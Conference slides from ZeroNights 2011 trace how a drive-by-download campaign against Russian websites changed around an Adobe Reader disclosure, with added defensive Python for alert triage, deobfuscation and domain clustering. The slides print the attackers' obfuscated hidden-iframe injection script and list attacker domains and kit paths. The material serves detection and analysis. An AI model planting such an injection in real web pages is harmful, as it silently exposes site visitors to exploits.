Drive-By-Download Attack Evolution Before and After Vulnerability Disclosure
Vladimir B. Kropotov, TBINFORM (TNK-BP Group)
International Security Conference "ZeroNights 2011" - http://www.zeronights.org/
Drive-By-Download
• Attackers distribute malware by "poisoning" legitimate websites
• The attacker injects malicious iframes into the site's HTML content
• Vulnerabilities in browsers, Adobe Acrobat/Reader, Java, Flash Player, etc. are exploited on the visitor's machine
You just want information about insurance, nothing more, but…
What does it look like?
[Diagram of the classic chain: the PC connected to the Internet loads a known (legitimate) server carrying the injected iframe; the iframe pulls in an intermediate server controlled by the attacker, which collects OS, browser and plugin INFO and hands the visitor to an exploit server controlled by the attacker; a successful exploit fetches the payload from a malware server controlled by the attacker, and the "Malware host" is ready.]
How we find it?
IDS alert record (sensor local time, YEKST = Yekaterinburg summer time):
Date/Time 2011-08-05 10:44:53 YEKST
Tag Name PDF_XFA_Script
Observance Type Intrusion Detection
Cleared Flag false
Target IP Address 10.X.X.X
Target Object Name 9090
Target Object Type Target Port
Target Service unknown
Source IP Address 10.X.X.Y
SourcePort Name 2359
compressed zlib
server total.logeater.org
URL //images/np/45eebb038bd46a63e08665f3081fb408/6cd14aca59271182c8a04159f9ad2804.pdf
The alert fires on traffic from 10.X.X.Y:2359 to 10.X.X.X:9090; the web server that delivered the object is recorded in the "server" field.
DOES USER NEED IT?? The visitor was looking for insurance information; nothing in that asks for a zlib-compressed PDF with XFA script from total.logeater.org under a randomised hex path.
First indicators (chronological)
Date/Time 2011-07-26 11:24:37
Tag Name PDF_XFA_Script
arg 3592ba48df0fae9e5f5c5b09535a070d0b04020600510f0c56075c06040750
compressed zlib
server mamjhvbw.dyndns.pro
URL /ghqlv3ym/

Date/Time 2011-08-09 10:17:14
Tag Name PDF_XFA_Script
arg host=http://inaptly.in&b=486def4
compressed gzip
server inaptly.in
URL /jb/lastrger.php

Date/Time 2011-08-14 14:06:28
Tag Name PDF_XFA_Script
arg host=http://oligist.in&b=486def4
compressed gzip
server oligist.in
URL /jb/lastrger.php

Date/Time 2011-08-16 13:24:44
Tag Name ActiveX_Warning
clsid CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA (Java Deployment Toolkit)
server skipetar.in
URL /jb/pda.js

Date/Time 2011-08-18 19:00:13
Tag Name PDF_XFA_Script
arg host=http://e1in.in/stat&u=root
compressed zlib
server e1in.in
URL /stat/574a353789f/lastrger.php

Date/Time 2011-08-18 19:00:13
Tag Name ActiveX_Warning
clsid CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA (Java Deployment Toolkit)
server e1in.in
URL /stat/574a353789f/pda.js

The same kit paths (lastrger.php with a host= callback argument, pda.js loading the Java Deployment Toolkit) recur across several freshly registered .in domains.
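The alert fields above are all an analyst has to work with, so here is an added example (written for this page, not part of the talk) that parses records in the same export layout and applies the pivots the talk relies on: the PDF_XFA_Script tag, the Java Deployment Toolkit CLSID, the randomised 32-hex path component, a dynamic-DNS hostname, the host= callback argument, and identical kit paths (/jb/lastrger.php) appearing on several fresh domains. The alert text is re-typed from the slides as constructed input; the indicator names, the dynamic-DNS suffix list and the scoring rules are the editor's assumptions, not the sensor's.

```python
"""Triage of IDS alert exports for drive-by-download indicators (editor's added example)."""
import re
from collections import defaultdict

# Alert records as the slides show them, re-typed as constructed input in the
# sensor's "Field Name value" layout (blank line between records; some field
# names carry a leading ':' in the export).
SAMPLE_ALERTS = """\
Date/Time 2011-08-05 10:44:53
Tag Name PDF_XFA_Script
Target IP Address 10.X.X.X
Target Object Name 9090
Target Object Type Target Port
Source IP Address 10.X.X.Y
SourcePort Name 2359
:compressed zlib
:server total.logeater.org
:URL //images/np/45eebb038bd46a63e08665f3081fb408/6cd14aca59271182c8a04159f9ad2804.pdf

Date/Time 2011-07-26 11:24:37
Tag Name PDF_XFA_Script
arg 3592ba48df0fae9e5f5c5b09535a070d0b04020600510f0c56075c06040750
compressed zlib
server mamjhvbw.dyndns.pro
URL /ghqlv3ym/

Date/Time 2011-08-18 19:00:13
Tag Name ActiveX_Warning
clsid CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA
server e1in.in
URL /stat/574a353789f/pda.js

Date/Time 2011-08-09 10:17:14
Tag Name PDF_XFA_Script
arg host=http://inaptly.in&b=486def4
compressed gzip
server inaptly.in
URL /jb/lastrger.php

Date/Time 2011-08-14 14:06:28
Tag Name PDF_XFA_Script
:arg host=http://oligist.in&b=486def4
:compressed gzip
:server oligist.in
:URL /jb/lastrger.php
"""

FIELDS = ("Date/Time", "Tag Name", "Target IP Address", "Target Object Name",
          "Target Object Type", "Target Service", "Source IP Address",
          "SourcePort Name", "arg", "clsid", "compressed", "server", "URL")

JAVA_DT_CLSID = "CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA"    # Java Deployment Toolkit ActiveX control
DYNDNS_SUFFIXES = ("dyndns.pro", "dyndns.org", "no-ip.org")  # assumed list; extend for your environment
HEX32_SEGMENT = re.compile(r"/[0-9a-f]{32}(?=[/.]|$)")       # 32-hex-char path component (e.g. an MD5)
HEX_BLOB = re.compile(r"[0-9a-f]{32,}")


def parse_alerts(text):
    """Split the export into one dict per record, keyed by the field names above."""
    alerts, cur = [], {}
    for raw in text.splitlines():
        line = raw.strip().lstrip(":")
        if not line:
            if cur:
                alerts.append(cur)
                cur = {}
            continue
        for key in FIELDS:
            if line.startswith(key + " "):
                cur[key] = line[len(key) + 1:].strip()
                break
    if cur:
        alerts.append(cur)
    return alerts


def triage(alert):
    """Return the indicator names that apply to one alert (empty list = nothing notable)."""
    reasons = []
    url, server, arg = alert.get("URL", ""), alert.get("server", ""), alert.get("arg", "")
    if alert.get("Tag Name") == "PDF_XFA_Script":
        reasons.append("pdf-xfa")               # PDF carrying XFA script: a classic exploit carrier
    if alert.get("clsid", "").upper() == JAVA_DT_CLSID:
        reasons.append("java-dt-activex")       # page instantiates the Java Deployment Toolkit
    if HEX32_SEGMENT.search(url):
        reasons.append("random-hex-path")       # per-victim / per-campaign randomised path
    if any(server == s or server.endswith("." + s) for s in DYNDNS_SUFFIXES):
        reasons.append("dynamic-dns-host")      # throwaway hostname under a dynamic-DNS provider
    if arg.startswith("host="):
        reasons.append("kit-callback-arg")      # exploit kit telling the exploit where to call back
    elif HEX_BLOB.fullmatch(arg):
        reasons.append("encoded-arg")           # opaque hex blob handed to the exploit
    return reasons


def shared_paths(alerts):
    """Identical URL paths served from more than one domain: one kit behind disposable domains."""
    by_path = defaultdict(set)
    for a in alerts:
        if "URL" in a and "server" in a:
            by_path[a["URL"]].add(a["server"])
    return {p: sorted(s) for p, s in by_path.items() if len(s) > 1}


if __name__ == "__main__":
    parsed = parse_alerts(SAMPLE_ALERTS)
    for a in parsed:
        print(a["Date/Time"], a.get("server"), a.get("URL"), triage(a))
    print("shared kit paths:", shared_paths(parsed))
```

The shared-path pivot is the cheapest of these: once /jb/lastrger.php is known from one domain, every other domain serving the same path can be blocked before it ever reaches a blacklist.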
Example: o-strahovanie.ru, Sep 02
Script injected into the page between "============ bbb ============" markers, pretty-printed here (the original is one line). The "4 osel" comment is the attacker's own: "osel" (donkey) is Russian slang for Internet Explorer, i.e. the branch for browsers without localStorage.

    document.xmlSettings.if_ik=false;
    // Re-arm only if the stored timestamp is older than 2592000 s (30 days)
    if(window.localStorage){
      if(window.localStorage.if_ik){
        if(parseInt(window.localStorage.if_ik)+2592000 < document.xmlSettings.time()) document.xmlSettings.if_ik=true;
      }else document.xmlSettings.if_ik=true;
    }else{// 4 osel
      if(document.xmlSettings.getCookie('if_ik')){
        if(parseInt(document.xmlSettings.getCookie('if_ik'))+2592000 < document.xmlSettings.time()) document.xmlSettings.if_ik=true;
      }else document.xmlSettings.if_ik=true;
    }
    if(document.xmlSettings.if_ik){
      // Remember this victim for a year, then inject a 1x1 iframe positioned off-screen
      if(window.localStorage)window.localStorage.if_ik=document.xmlSettings.time();
      else document.xmlSettings.setCookie('if_ik',document.xmlSettings.time(),{ expires:(document.xmlSettings.time() + 86400*365) });
      document.xmlSettings.iframe=document.createElement('iframe');
      document.xmlSettings.iframe.style.cssText='height:1px;position:absolute;width:1px;border:none;left:-5000px;';
      document.body.appendChild(document.xmlSettings.iframe);
      document.xmlSettings.iframe.src='htt'+'p://'+'disreg'+'arding.i'+'n/xtqd2/08.p'+'hp';
    }

Cookie left on the victim (Internet Explorer cookie-file record; the value is the Unix time written by the script):
if_ik
1315314771
www.o-strahovanie.ru/
1600429305625633310239293001403230174358*

Deobfuscated iframe target:
iframe.src='http://disregarding.in/xtqd2/08.php'
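As an added example (editor's code, not from the talk), the following Python folds the 'htt'+'p://'+… concatenation statically instead of executing the script, extracts the iframe target, checks whether the cssText hides the frame, and reads the 2592000-second re-arm window, which is why a second visit from the same machine within 30 days shows no iframe at all. The script text is the one on the slide, re-wrapped at statement boundaries as constructed input; the regexes and hidden-CSS heuristics are the editor's.

```python
"""Static deobfuscation of the string-concatenated iframe injection (editor's added example)."""
import re

# The injected script from the o-strahovanie.ru slide, constructed test input,
# re-wrapped at statement boundaries (the original is a single line).
INJECTED = r"""
document.xmlSettings.if_ik=false;
if(window.localStorage){
  if(window.localStorage.if_ik){
    if(parseInt(window.localStorage.if_ik)+2592000 < document.xmlSettings.time()) document.xmlSettings.if_ik=true;
  }else document.xmlSettings.if_ik=true;
}else{// 4 osel
  if(document.xmlSettings.getCookie('if_ik')){
    if(parseInt(document.xmlSettings.getCookie('if_ik'))+2592000 < document.xmlSettings.time()) document.xmlSettings.if_ik=true;
  }else document.xmlSettings.if_ik=true;
}
if(document.xmlSettings.if_ik){
  if(window.localStorage)window.localStorage.if_ik=document.xmlSettings.time();
  else document.xmlSettings.setCookie('if_ik',document.xmlSettings.time(),{ expires:(document.xmlSettings.time() + 86400*365) });
  document.xmlSettings.iframe=document.createElement('iframe');
  document.xmlSettings.iframe.style.cssText='height:1px;position:absolute;width:1px;border:none;left:-5000px;';
  document.body.appendChild(document.xmlSettings.iframe);
  document.xmlSettings.iframe.src='htt'+'p://'+'disreg'+'arding.i'+'n/xtqd2/08.p'+'hp';
}
"""

# One JS string literal (single- or double-quoted, with backslash escapes).
STR = r"'(?:[^'\\]|\\.)*'" + r'|"(?:[^"\\]|\\.)*"'
# A chain of two or more literals joined with '+'.
CONCAT = re.compile(rf"(?:{STR})(?:\s*\+\s*(?:{STR}))+")
# CSS that hides an element while keeping it in the DOM.
HIDDEN_CSS = (r"left:\s*-\d{3,}px", r"top:\s*-\d{3,}px", r"width:\s*[01]px",
              r"height:\s*[01]px", r"display:\s*none", r"visibility:\s*hidden")


def fold_concats(js):
    """Replace every 'a'+'b'+'c' chain with the single literal 'abc' (quotes normalised to single)."""
    def join(m):
        parts = re.findall(STR, m.group(0))
        return "'" + "".join(p[1:-1] for p in parts) + "'"
    return CONCAT.sub(join, js)


def find_hidden_iframes(js):
    """Return (src, hidden) for every iframe src assignment in the script."""
    folded = fold_concats(js).replace('"', "'")
    if "createElement('iframe')" not in folded:
        return []
    css_blocks = re.findall(r"cssText\s*=\s*'([^']*)'", folded)
    hidden = any(re.search(pat, css) for css in css_blocks for pat in HIDDEN_CSS)
    return [(src, hidden) for src in re.findall(r"\.src\s*=\s*'([^']+)'", folded)]


def revisit_gate_seconds(js):
    """Seconds the script waits before re-arming for the same victim (the
    parseInt(stored)+N < now check), or None if there is no such gate."""
    m = re.search(r"parseInt\([^)]*\)\s*\+\s*(\d+)\s*<", js)
    return int(m.group(1)) if m else None


if __name__ == "__main__":
    for src, hidden in find_hidden_iframes(INJECTED):
        print("iframe ->", src, "(hidden)" if hidden else "")
    gate = revisit_gate_seconds(INJECTED)
    print("re-arm after", gate, "s =", gate // 86400, "days")
```

The gate explains a common analyst mistake: reproducing the infection from the same workstation, or the same browser profile, within the window shows a clean page. Clear localStorage and cookies, or use a fresh VM, before re-testing.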
Drive By Download: o-strahovanie.ru, Sep 02
[Same diagram: PC connected to the Internet -> known server with iframe -> intermediate server disregarding.in, which collects OS, browser and plugin INFO. Exploit server: NO. Malware server: NO. Nothing is delivered yet.]
Drive By Download: o-strahovanie.ru, Sep 12
[Same diagram: PC connected to the Internet -> known server with iframe -> intermediate server disregarding.in -> exploit server chamberwoman.in / janiculum.in -> malware server chamberwoman.in / janiculum.in -> Malware host ready.]
Example: o-strahovanie.ru, whois
Domain ID:D5165642-AFIN
Domain Name:DISREGARDING.IN
Created On:14-Jul-2011 11:09:59 UTC
Registrant Name:Russell Rosario
Registrant Street1:136 Oakdale Avenue
City:Winter Haven
Registrant Country:US
Email:[email protected]
Name Server:NS1.PRIDES.ME
Name Server:NS2.PRIDES.ME

Domain Name:JANICULUM.IN, CHAMBERWOMAN.IN
Created On:12-Sep-2011 08:14 UTC
Registrant Name:Russell Rosario

No payload, because no payload requests?
Are they looking for customers?

Russell Rosario
filtrated.in Created On:14-Jul-2011 11:09:56 UTC
raptnesses.in Created On:14-Jul-2011 11:09:56 UTC
tansies.in Created On:14-Jul-2011 11:10:03 UTC

Domain Name:FILTRATED.IN
Created On:14-Jul-2011 11:09:53 UTC
Sponsoring Registrar:Directi Web Services Pvt. Ltd. (R118-AFIN)
Registrant ID:TS_16731618
Registrant Name:Russell Rosario
Registrant Street1:136 Oakdale Avenue
Registrant City:Winter Haven
Registrant State/Province:Florida
Registrant Postal Code:33830
Registrant Country:US
Registrant Phone:+1.8635571308
Email:[email protected]
But Sally Doesn't Know…
Attack before public disclosure
• Primary location for malicious sites: .IN
• Physical server location by IP address: Romania
• Responsible person (whois registrant): Russell Rosario
• Domains are new
Domain owner is the same:
Domain Name Created On Registrant Name
irrefutably.in 15-Jul-2011 11:00:21 UTC Russell Rosario
comprador.in 25-Jul-2011 05:59:54 UTC Russell Rosario
hyalines.in 29-Jul-2011 09:39:33 UTC Russell Rosario
suffrago.in 01-Aug-2011 05:35:12 UTC Russell Rosario
ruritanian.in 01-Aug-2011 05:35:50 UTC Russell Rosario
20-Jul-2011: Acrobat vulnerabilities, vendor notified
Vulnerabilities reported to the vendor:
VUPEN Security Research - Adobe Acrobat and Reader PCX Processing Heap Overflow Vulnerability
VUPEN Security Research - Adobe Acrobat and Reader IFF Processing Heap Overflow Vulnerability
VUPEN Security Research - Adobe Acrobat and Reader Picture Dimensions Heap Overflow Vulnerability
VUPEN Security Research - Adobe Acrobat and Reader TIFF BitsPerSample Heap Overflow Vulnerability
X. DISCLOSURE TIMELINE
-----------------------------
2011-07-20 - Vulnerability Discovered by VUPEN and shared with TPP customers
2011-09-14 - Public disclosure
ZDI-11-310 : Adobe Reader Compound Glyph Index Sign Extension Remote Code Execution Vulnerability
-- Disclosure Timeline:
2011-07-20 - Vulnerability reported to vendor
2011-10-26 - Coordinated public release of advisory
ZDI-11-316 : Apple QuickTime H264 Matrix Conversion Remote Code Execution Vulnerability
-- Disclosure Timeline:
2011-07-20 - Vulnerability reported to vendor
2011-10-27 - Coordinated public release of advisory
Harvesting machine started
Domain Name Created On Registrant Name
microdrili.in 05-Aug-2011 07:13:08 UTC Russell Rosario
oligist.in 05-Aug-2011 07:13:12 UTC Russell Rosario
provost.in 05-Aug-2011 07:13:18 UTC Russell Rosario
vaginalitis.in 05-Aug-2011 07:13:25 UTC Russell Rosario
kremlinology.in 05-Aug-2011 07:13:35 UTC Russell Rosario
invariance.in 05-Aug-2011 07:13:41 UTC Russell Rosario
alleghenian.in 05-Aug-2011 07:13:48 UTC Russell Rosario
dandifies.in 05-Aug-2011 07:14:06 UTC Russell Rosario
xenophoby.in 05-Aug-2011 07:14:09 UTC Russell Rosario
alliaria.in 05-Aug-2011 07:14:15 UTC Russell Rosario
skipetar.in 05-Aug-2011 07:14:21 UTC Russell Rosario
inaptly.in 05-Aug-2011 07:15:05 UTC Russell Rosario
allhallowtide.in 05-Aug-2011 07:15:20 UTC Russell Rosario
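The whois data on the last few slides is enough to show the registration pattern mechanically. The added example below (editor's code, not the speaker's) parses the Created On values quoted on the slides, clusters registrations made within two minutes of each other into bursts, places each registration relative to the 2011-07-20 vendor notification and the 2011-09-14 public disclosure, and computes how old a domain was when the sensor first saw it. Assumptions: the sensor timestamps are YEKST (UTC+6), as the first alert on the slides shows, and the two-minute burst gap is the editor's threshold.

```python
"""Registration-burst and domain-age analysis of the whois data on the slides (editor's added example)."""
from datetime import datetime, timedelta

VENDOR_NOTIFIED = datetime(2011, 7, 20)      # VUPEN and ZDI: reported to vendor
PUBLIC_DISCLOSURE = datetime(2011, 9, 14)    # VUPEN Acrobat/Reader advisories published
SENSOR_UTC_OFFSET = timedelta(hours=6)       # assumption: IDS times are YEKST (UTC+6)

# "Created On" values (UTC) copied from the slides; every record shown there names the same registrant.
REGISTRANT = "Russell Rosario"
REGISTRATIONS = [
    ("disregarding.in",  "14-Jul-2011 11:09:59"),
    ("filtrated.in",     "14-Jul-2011 11:09:56"),
    ("raptnesses.in",    "14-Jul-2011 11:09:56"),
    ("tansies.in",       "14-Jul-2011 11:10:03"),
    ("irrefutably.in",   "15-Jul-2011 11:00:21"),
    ("comprador.in",     "25-Jul-2011 05:59:54"),
    ("hyalines.in",      "29-Jul-2011 09:39:33"),
    ("suffrago.in",      "01-Aug-2011 05:35:12"),
    ("ruritanian.in",    "01-Aug-2011 05:35:50"),
    ("microdrili.in",    "05-Aug-2011 07:13:08"),
    ("oligist.in",       "05-Aug-2011 07:13:12"),
    ("provost.in",       "05-Aug-2011 07:13:18"),
    ("vaginalitis.in",   "05-Aug-2011 07:13:25"),
    ("kremlinology.in",  "05-Aug-2011 07:13:35"),
    ("invariance.in",    "05-Aug-2011 07:13:41"),
    ("alleghenian.in",   "05-Aug-2011 07:13:48"),
    ("dandifies.in",     "05-Aug-2011 07:14:06"),
    ("xenophoby.in",     "05-Aug-2011 07:14:09"),
    ("alliaria.in",      "05-Aug-2011 07:14:15"),
    ("skipetar.in",      "05-Aug-2011 07:14:21"),
    ("inaptly.in",       "05-Aug-2011 07:15:05"),
    ("allhallowtide.in", "05-Aug-2011 07:15:20"),
    ("janiculum.in",     "12-Sep-2011 08:14"),
    ("chamberwoman.in",  "12-Sep-2011 08:14"),
]

# First IDS sighting of the domain (sensor local time, from the "First indicators" slides).
FIRST_SEEN = {
    "inaptly.in":  "2011-08-09 10:17:14",
    "oligist.in":  "2011-08-14 14:06:28",
    "skipetar.in": "2011-08-16 13:24:44",
}


def parse_created(s):
    """Whois 'Created On' with or without seconds."""
    for fmt in ("%d-%b-%Y %H:%M:%S", "%d-%b-%Y %H:%M"):
        try:
            return datetime.strptime(s, fmt)
        except ValueError:
            pass
    raise ValueError(f"unrecognised whois date: {s!r}")


def registration_bursts(regs, max_gap=timedelta(minutes=2)):
    """Sort registrations by time and start a new burst whenever the gap to the
    previous one exceeds max_gap; return only bursts of two or more domains."""
    if not regs:
        return []
    ordered = sorted((parse_created(created), domain) for domain, created in regs)
    bursts, cur = [], [ordered[0]]
    for prev, item in zip(ordered, ordered[1:]):
        if item[0] - prev[0] <= max_gap:
            cur.append(item)
        else:
            bursts.append(cur)
            cur = [item]
    bursts.append(cur)
    return [[domain for _, domain in b] for b in bursts if len(b) > 1]


def age_at_first_seen(domain, regs=REGISTRATIONS, seen=FIRST_SEEN, offset=SENSOR_UTC_OFFSET):
    """How old the domain was (timedelta) when the sensor first alerted on it, both sides in UTC."""
    created = parse_created(dict(regs)[domain])
    first = datetime.strptime(seen[domain], "%Y-%m-%d %H:%M:%S") - offset
    return first - created


def phase(created):
    """Where a registration falls on the disclosure timeline."""
    t = parse_created(created)
    if t < VENDOR_NOTIFIED:
        return "before vendor notification"
    if t < PUBLIC_DISCLOSURE:
        return "between notification and public disclosure"
    return "after public disclosure"


if __name__ == "__main__":
    for b in registration_bursts(REGISTRATIONS):
        print(f"burst of {len(b):2d} domains, {phase(dict(REGISTRATIONS)[b[0]])}: {', '.join(b)}")
    for d in FIRST_SEEN:
        print(f"{d:14s} first seen {age_at_first_seen(d).days} days after registration")
```

Bulk registration in one sitting under one registrant, followed by use within days, is exactly the signal a registrar or a DNS-based blocklist could act on long before an AV signature exists; here all of it happens weeks before the vulnerabilities were public.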
But maybe someone knows?
• Spamlists
• AV Vendors
• Safebrowsing
• Securityfocus
Spamlists: Aug 19
AV vendors: Aug 18
Safebrowsing: Aug 20
Securityfocus: Sep 07
Sent: Wednesday, September 07, 2011 11:31 PM
Subject: There is a strange GET request header in all web pages of my site? I'm worried about a Trojan attack!
Today I found that Kasper Anti Virus has blocked my site and says to the clients that this site is affected by a Trojan. I traced my site with the Fiddler debugging tool and I found that every time I send a request to the site a GET request handler is established to the following URL:
"http://carlos.c0m.li/iframe.php?id=v4pfa24nw91yhoszkdmoh413ywv6cp7"
PDF vulnerabilities public disclosure Sep 14. What to expect?
NO GOOD NEWS, JUST EPIC FAIL for site administrators
No good news. Hundreds of domains were registered
ITALIA-NEW.IN
BANER-KLERK.RU
BANK-KLERK.RU
BANNER-KLERK.RU
BLOGS-KLERK.RU
BUH-KLERK.RU
DAILY-KP.RU
FORUM-KLERK.RU
I-OBOZREVATEL.RU
INTERFAX-REGION.RU
JOB-KLERK.RU
KLERK-BANK.RU
KLERK-BANKIR.RU
KLERK-BIZ.RU
KLERK-BOSS.RU
KLERK-BUH.RU
KLERK-EVEN.RU
KLERK-EVENTS.RU
KLERK-LAW.RU
KLERK-NEW.RU
KLERK-NEWS.RU
KLERK-REKLAMA.RU
KLERK-RU.RU
KLERK-WORK.RU
KLERK2.RU
OBOZREVATEL-RU.RU
OBOZREVATELRU.RU
WIKI-KLERK.RU
PRESS-RZD.RU
RZD-RZD.RU
IPGEOBASE.IN
* * *
"New generation"
[Diagram: the chain as before (PC connected to the Internet -> known server with iframe -> intermediate server controlled by attacker, collecting OS, browser and plugin INFO -> exploit server controlled by attacker -> malware server controlled by attacker -> Malware host ready), plus a new element: most of the time the intermediate server sends the visitor on to another known server NOT controlled by the attacker.]
Attack after public disclosure
• Primary location for malicious sites: .IN, .RU, .CX.CC, .BIZ, .INFO, …
• Physical server location by IP address: international
• Domains registered to different spurious persons
• Domain lifetime ~ time until it appears on blacklists
• The attack refers to the malicious server for only a short period of time, and to a well-known one almost all day long (blacklist evasion technique)
• If you don't know the exact malware URL, the site redirects to a well-known server
• Different types of payload used: password stealers, winlockers, and even "normal" (or another ZD) files installed
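The "short period on the malicious server, all day on a well-known one" behaviour can be caught from redirect logs rather than from blacklists. The added example below (editor's code, not the talk's) parses constructed proxy-style log lines (timestamp, client, requested URL, status, Location header, Referer) for the intermediate host disregarding.in, measures for how much of the observed day each redirect target was in use, and flags targets active for only a small slice while another target covers most of the day. The log lines, the decoy hostname well-known-site.example and the 10 % threshold are constructed or assumed; only the attacker hostnames and paths come from the slides.

```python
"""Spotting blacklist-evading redirect windows in redirect logs (editor's added example)."""
from datetime import datetime
from urllib.parse import urlsplit

# Constructed log: timestamp, client, requested URL, status, Location, Referer.
# The compromised site frames disregarding.in all day; the hop answers with a
# redirect to a harmless well-known site except for ~16 minutes around 13:00,
# when it sends visitors to the exploit server.
LOG = """\
2011-09-12T08:00:05 10.0.0.11 http://disregarding.in/xtqd2/08.php 302 http://well-known-site.example/ http://www.o-strahovanie.ru/
2011-09-12T09:12:40 10.0.0.12 http://disregarding.in/xtqd2/08.php 302 http://well-known-site.example/ http://www.o-strahovanie.ru/
2011-09-12T10:30:01 10.0.0.13 http://disregarding.in/xtqd2/08.php 302 http://well-known-site.example/ http://www.o-strahovanie.ru/
2011-09-12T11:45:22 10.0.0.14 http://disregarding.in/xtqd2/08.php 302 http://well-known-site.example/ http://www.o-strahovanie.ru/
2011-09-12T12:20:09 10.0.0.15 http://disregarding.in/xtqd2/08.php 302 http://well-known-site.example/ http://www.o-strahovanie.ru/
2011-09-12T13:02:15 10.0.0.16 http://disregarding.in/xtqd2/08.php 302 http://chamberwoman.in/jb/lastrger.php http://www.o-strahovanie.ru/
2011-09-12T13:09:48 10.0.0.17 http://disregarding.in/xtqd2/08.php 302 http://chamberwoman.in/jb/lastrger.php http://www.o-strahovanie.ru/
2011-09-12T13:18:33 10.0.0.18 http://disregarding.in/xtqd2/08.php 302 http://chamberwoman.in/jb/lastrger.php http://www.o-strahovanie.ru/
2011-09-12T14:05:50 10.0.0.19 http://disregarding.in/xtqd2/08.php 302 http://well-known-site.example/ http://www.o-strahovanie.ru/
2011-09-12T15:33:11 10.0.0.20 http://disregarding.in/xtqd2/08.php 302 http://well-known-site.example/ http://www.o-strahovanie.ru/
2011-09-12T16:48:02 10.0.0.21 http://disregarding.in/xtqd2/08.php 302 http://well-known-site.example/ http://www.o-strahovanie.ru/
2011-09-12T17:59:40 10.0.0.22 http://disregarding.in/xtqd2/08.php 302 http://well-known-site.example/ http://www.o-strahovanie.ru/
"""


def parse_log(text):
    """One dict per line, with hostnames extracted from the three URL fields."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, url, status, location, referer = line.split()
        events.append({
            "time": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S"),
            "client": client,
            "status": int(status),
            "hop": urlsplit(url).hostname,
            "target": urlsplit(location).hostname,
            "referer": urlsplit(referer).hostname,
        })
    return events


def redirect_windows(events, hop):
    """For one intermediate host: per redirect target, first/last sighting, hit count and
    the share of the hop's whole observed span during which that target was in use."""
    mine = [e for e in events if e["hop"] == hop and 300 <= e["status"] < 400]
    if not mine:
        return {}
    span = (max(e["time"] for e in mine) - min(e["time"] for e in mine)).total_seconds() or 1.0
    windows = {}
    for e in mine:
        w = windows.setdefault(e["target"], {"first": e["time"], "last": e["time"], "count": 0})
        w["first"], w["last"] = min(w["first"], e["time"]), max(w["last"], e["time"])
        w["count"] += 1
    for w in windows.values():
        w["share"] = (w["last"] - w["first"]).total_seconds() / span
    return windows


def flag_short_lived(windows, max_share=0.10):
    """Targets used for at most max_share of the day while another target covers at
    least half of it: the short-window malicious hop behind an all-day decoy.
    A target seen only once has share 0 and is flagged as well."""
    if len(windows) < 2:
        return []
    dominant = max(windows, key=lambda t: windows[t]["share"])
    if windows[dominant]["share"] < 0.5:
        return []
    return sorted(t for t, w in windows.items() if t != dominant and w["share"] <= max_share)


if __name__ == "__main__":
    wins = redirect_windows(parse_log(LOG), "disregarding.in")
    for target, w in wins.items():
        print(f"{target:26s} hits={w['count']:2d} active {w['first']:%H:%M}-{w['last']:%H:%M} share={w['share']:.2f}")
    print("short-lived redirect targets:", flag_short_lived(wins))
```

A single analyst visit outside the window, or a blacklist crawler that fetches the hop once, sees only the decoy; the time dimension in the logs is what exposes the second target.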
Known sites examples: RZD.RU (Russian Railways)
Known sites examples: KP.RU (Komsomolskaya Pravda, newspaper)
Other examples: EG.RU (newspaper, 263 685 visits per day)
Other examples: svpressa.ru (newspaper, 276 720 visits per day)
Malware examples: Banks targeted attack
• Legal
• Faked
Another news, another phone…
Malware examples
Script examples
Sample analysis (Virus Total)
What can we do?
• Patch endpoints
• Tighten Internet filtering (default deny if possible)
• No Internet surfing with admin rights
• See what's happening (continuous monitoring)
• Check if you're well (regular technical audits)
• Educate people
Credits
• Sergey V. Soldatov, TBINFORM (TNK-BP Group)
• Konstantin Y. Kadushkin, TBINFORM (TNK-BP Group)
• Wayne Huang, ARMORIZE
THE END
Vladimir B. Kropotov, Information security analyst, TBINFORM (TNK-BP Group)